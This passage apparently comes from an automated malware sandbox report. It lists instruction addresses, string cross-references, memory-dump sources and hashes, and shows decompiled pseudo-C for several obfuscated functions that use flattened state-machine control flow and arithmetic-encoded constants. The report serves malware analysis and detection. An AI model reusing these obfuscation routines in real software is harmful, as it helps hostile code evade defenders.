0x00248dc7
0x00248dd3
0x00248dd8
0x00248dde
0x00248de6
0x00248dee
0x00248dfa
0x00248dff
0x00248e09
0x00248e0c
0x00248e10
0x00248e18
0x00248e20
0x00248e28
0x00248e30
0x00248e38
0x00248e40
0x00248e45
0x00248e51
0x00248e56
0x00248e5a
0x00248e5c
0x00248e64
0x00248e6c
0x00248e74
0x00248e79
0x00248e7c
0x00248e92
0x00248e94
0x00248e9c
0x00248ea2
0x00248ea9
0x00248eaf
0x00248eb5
0x00248ebe
0x00248ecc
0x00248ecd
0x00248ed8
0x00248ede
0x00248ee5
0x00248ef0
0x00248ef5
0x00248efc
0x00248f02
0x00248f02
0x00248ede
0x00248ebe
0x00248ea9
0x00248f0e

Strings

9*, xrefs: 00248D67
oMt, xrefs: 00248DA7
/, xrefs: 00248E38
4A3, xrefs: 00248D5F

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /$4A3$9*$oMt
API String ID: 0-1186868077
Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction ID: 48acea688c4007531ed03294033ddda8ed6829c766865f32edfdf92098ab259e
Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
Instruction Fuzzy Hash: 725154716183429FD358CF25D48A90FFBE1FB98358F204A1CF49996260C7B4DA59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00232A30, Relevance: 5.1, Strings: 4, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00232A30(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v124;
				void* _t120;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				intOrPtr _t146;

				_v12 = 0xa0d7;
				_v12 = _v12 + 0x7eb;
				_v12 = _v12 + 0xffff9690;
				_t130 = 0x70;
				_v12 = _v12 / _t130;
				_v12 = _v12 ^ 0x00005cb7;
				_v36 = 0xa6e2;
				_t131 = 0x7c;
				_t146 = _a4;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 ^ 0x00462f2b;
				_v20 = 0xf5ce;
				_v20 = _v20 + 0xec5e;
				_v20 = _v20 | 0x882d1c6f;
				_v20 = _v20 ^ 0x882decee;
				_v8 = 0xef73;
				_v8 = _v8 * 0x50;
				_v8 = _v8 ^ 0x984778b6;
				_v8 = _v8 | 0x0acb781a;
				_v8 = _v8 ^ 0x9acfaccf;
				_v16 = 0xf20c;
				_t132 = 0x6d;
				_v16 = _v16 / _t131;
				_v16 = _v16 | 0x2a1cc570;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x225769f1;
				_v28 = 0xd318;
				_v28 = _v28 / _t132;
				_v28 = _v28 ^ 0x955bcf9a;
				_v28 = _v28 ^ 0x955bcc47;
				_v40 = 0xc2b8;
				_v40 = _v40 + 0x609d;
				_v40 = _v40 ^ 0x00014342;
				_v24 = 0x21cc;
				_v24 = _v24 << 5;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x10e64576;
				_v48 = 0xc8ed;
				_v48 = _v48 + 0xffffe729;
				_v48 = _v48 ^ 0x00009812;
				_v32 = 0xdf82;
				_v32 = _v32 ^ 0xa0cf88d1;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0a0ce5c9;
				_v44 = 0xf2d1;
				_v44 = _v44 + 0x3831;
				_v44 = _v44 ^ 0x00011e20;
				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
				_t149 = _t120;
				if(_t120 != 0) {
					E00242349(_v12, _v36, _v20, _v8, _t132);
					_v60 =  &_v124;
					_v56 = E0023F85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
					E00242025(_v48, _v56, _v32, _v44);
				}
				return 0;
			}

0x00232a36
0x00232a3f
0x00232a46
0x00232a53
0x00232a58
0x00232a5d
0x00232a64
0x00232a6f
0x00232a72
0x00232a75
0x00232a78
0x00232a7f
0x00232a86
0x00232a8d
0x00232a94
0x00232a9b
0x00232aa6
0x00232aa9
0x00232ab0
0x00232ab7
0x00232abe
0x00232aca
0x00232acb
0x00232ad0
0x00232adf
0x00232ae2
0x00232ae9
0x00232af5
0x00232af8
0x00232aff
0x00232b06
0x00232b0d
0x00232b14
0x00232b1b
0x00232b22
0x00232b26
0x00232b2a
0x00232b31
0x00232b38
0x00232b3f
0x00232b46
0x00232b4d
0x00232b54
0x00232b58
0x00232b5f
0x00232b66
0x00232b6d
0x00232b77
0x00232b7a
0x00232b7c
0x00232b8f
0x00232b9d
0x00232bb2
0x00232bbe
0x00232bcd
0x00232bd3
0x00232bda

Strings

^, xrefs: 00232A86
18, xrefs: 00232B66
s, xrefs: 00232A9B
+/F, xrefs: 00232A78

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: +/F$18$^$s
API String ID: 0-1171060364
Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction ID: e2164e15692062245ebe3d6e82817479502e3cdd1ce4b78a57f7aeaccf719db0
Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction Fuzzy Hash: E351F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94

Uniqueness

Uniqueness Score: -1.00%

Function 002473AC, Relevance: 4.0, Strings: 3, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002473AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00249465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E0024340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E002489D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x24ca2c; // 0x5d8300
							E00246128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x24ca2c; // 0x5d8300
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E0023F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E0023F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E0023EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}

0x002473ac
0x002473af
0x002473ba
0x002473bc
0x002473c0
0x002473c8
0x002473d0
0x002473d8
0x002473e0
0x002473f2
0x002473f6
0x002473ff
0x00247404
0x0024740a
0x00247412
0x0024741e
0x00247423
0x00247429
0x00247431
0x00247439
0x00247441
0x00247449
0x00247451
0x00247456
0x0024745e
0x00247466
0x0024746e
0x00247476
0x0024747b
0x00247480
0x00247488
0x00247495
0x00247496
0x0024749a
0x002474a2
0x002474aa
0x002474b2
0x002474ba
0x002474c2
0x002474ca
0x002474cf
0x002474d7
0x002474df
0x002474e7
0x002474ef
0x002474f7
0x002474ff
0x00247507
0x0024750c
0x00247514
0x0024751c
0x00247524
0x0024752c
0x00247534
0x00247538
0x00247540
0x00247548
0x00247550
0x00247558
0x00247560
0x00247565
0x0024756d
0x0024757b
0x0024757f
0x00247587
0x00247597
0x0024759c
0x002475a2
0x002475aa
0x002475b2
0x002475ba
0x002475bf
0x002475c4
0x002475cc
0x002475d9
0x002475da
0x002475e4
0x002475e8
0x002475ec
0x002475f4
0x002475f8
0x002475f8
0x002475fc
0x002475fc
0x002475fc
0x002475fc
0x00247602
0x00000000
0x00000000
0x00247608
0x002476e2
0x00000000
0x002476e2
0x00247614
0x00247793
0x0024779c
0x002477a2
0x002477a2
0x00247620
0x002476c4
0x002476ce
0x002476d6
0x002476d7
0x00000000
0x002476d7
0x0024762c
0x00247698
0x0024769d
0x002476a0
0x002476a3
0x00000000
0x00000000
0x002476a9
0x00000000
0x002476a9
0x00247634
0x00000000
0x0024763a
0x00247648
0x00247662
0x00247667
0x0024766e
0x00247675
0x00247678
0x00247679
0x0024767e
0x00000000
0x0024767e
0x00247634
0x002476f2
0x00247774
0x00247776
0x00000000
0x00247776
0x002476fa
0x0024775a
0x00247760
0x00247761
0x00000000
0x00247761
0x00247702
0x00000000
0x00000000
0x00247709
0x0024770e
0x00247728
0x0024772c
0x00247731
0x00247734
0x0024773a
0x00247740
0x00247740
0x0024773a
0x00000000
0x0024777b
0x0024777b
0x00000000

Strings

'V, xrefs: 0024757F
\, xrefs: 002475CC
bo, xrefs: 002475C4

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 'V$\$bo
API String ID: 0-4178943049
Opcode ID: 9d8106d64d37aca7ba755c0e74fa21ee2a66ddb5366a682e1964e58cb55c0f73
Instruction ID: 4358f4c8da5ddb53ae57625263d1a3a9b9e3a93a8aba7f791c9e13e457b45644
Opcode Fuzzy Hash: 9d8106d64d37aca7ba755c0e74fa21ee2a66ddb5366a682e1964e58cb55c0f73
Instruction Fuzzy Hash: 46A1537151C3428FD358CF28C48940BFBF2FBC4758F51892DF5AA96260C7B58A588F86

Uniqueness

Uniqueness Score: -1.00%

Function 002396CD, Relevance: 3.9, Strings: 3, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002396CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E0023602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00238736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E0024360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E002450F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00237998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00247A0F(_t222);
											_t192 = E002378A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}

0x002396d7
0x002396de
0x002396e5
0x002396e7
0x002396e9
0x002396ea
0x002396ef
0x002396f7
0x00239700
0x00239707
0x0023970c
0x00239712
0x0023971a
0x00239722
0x0023972a
0x00239732
0x0023973a
0x00239742
0x0023974a
0x00239752
0x0023975a
0x00239762
0x0023976a
0x00239772
0x0023977b
0x00239780
0x00239786
0x0023978a
0x00239792
0x0023979a
0x0023979f
0x002397a7
0x002397af
0x002397b7
0x002397bf
0x002397c7
0x002397cf
0x002397d7
0x002397df
0x002397e7
0x002397ef
0x002397f7
0x002397ff
0x00239807
0x0023980f
0x00239817
0x0023981f
0x00239824
0x00239829
0x00239831
0x0023983d
0x00239842
0x0023984d
0x0023984e
0x00239852
0x0023985a
0x00239862
0x0023986a
0x00239875
0x00239879
0x00239883
0x00239890
0x00239898
0x002398a6
0x002398a9
0x002398ad
0x002398b5
0x002398bd
0x002398ca
0x002398ce
0x002398d6
0x002398de
0x002398e6
0x002398ee
0x002398f6
0x002398fe
0x00239906
0x00239910
0x00239910
0x00239922
0x002399d7
0x002399d8
0x002399dc
0x002399e1
0x002399e5
0x002399e7
0x002399e9
0x00000000
0x002399e9
0x00239928
0x0023992e
0x002399b9
0x002399be
0x002399c1
0x00000000
0x00239930
0x00239932
0x00239995
0x0023999a
0x0023999d
0x00000000
0x00239934
0x0023993a
0x00239a1d
0x00239940
0x00239946
0x00000000
0x0023994c
0x0023994c
0x00239953
0x00239972
0x00239977
0x0023997a
0x0023997f
0x00000000
0x0023997f
0x00239946
0x0023993a
0x00239932
0x0023992e
0x00239a26
0x00239a28
0x00239a2c
0x00239a2c
0x00239a36
0x00239a36
0x002399f0
0x002399f2
0x002399f7
0x002399fa
0x002399fa
0x002399fa
0x00000000

Strings

&E, xrefs: 0023979F
D\, xrefs: 002398D6
M^, xrefs: 00239712

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &E$D\$M^
API String ID: 0-182273106
Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction ID: 5273681e539744de221480bce5bbc0da8f6f74133b7dac2cdd75fba39104ce74
Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction Fuzzy Hash: 9F8164B15183819FD368CF25C88991BBBF0BBD9354F50891CF196862A1D3B6CA99CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0023153C, Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0023153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E0023E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00238697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E002360B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E002328CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}

0x0023153c
0x00231546
0x00231550
0x00231558
0x0023155d
0x00231565
0x0023156d
0x00231575
0x0023157d
0x00231585
0x0023158d
0x00231595
0x0023159d
0x002315a5
0x002315ad
0x002315b5
0x002315ba
0x002315bf
0x002315c7
0x002315cf
0x002315d7
0x002315df
0x002315e7
0x002315ef
0x002315f7
0x002315ff
0x00231604
0x00231609
0x00231611
0x00231619
0x00231626
0x0023162a
0x0023162c
0x00231634
0x0023163c
0x00231644
0x0023164c
0x00231654
0x0023165c
0x0023166a
0x0023166d
0x00231675
0x00231679
0x0023167d
0x00231685
0x0023168d
0x00231695
0x0023169d
0x0023169d
0x002316af
0x0023176c
0x0023177c
0x0023177f
0x00231785
0x0023178e
0x0023179c
0x002316b5
0x002316bb
0x00231733
0x0023173b
0x00000000
0x002316bd
0x002316c3
0x00231715
0x0023171a
0x0023171e
0x00231720
0x00000000
0x00231720
0x002316c5
0x002316cb
0x002316f6
0x002316fb
0x00231700
0x00231706
0x00000000
0x00231706
0x002316cd
0x002316d3
0x00000000
0x002316d9
0x002316d9
0x00000000
0x002316d9
0x002316d3
0x002316cb
0x002316c3
0x002316bb
0x002317a0
0x002317ab
0x002317ab
0x00231757
0x00231759
0x0023175e
0x0023175e
0x00000000

Strings

Wx, xrefs: 002315EF
i^%4, xrefs: 00231720
i^%4, xrefs: 002316C5

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Wx$i^%4$i^%4
API String ID: 0-1584002782
Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction ID: 39f4710d89ebfa78ed42010ac6efb6bf4a3a7838aa570a9a997faf1b45a316ed
Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction Fuzzy Hash: 535158711183428FD398CE25C58A42BFBE1BBC4758F140E1DF496962A0D7B4CA69CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00247D03, Relevance: 3.9, Strings: 3, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00247D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
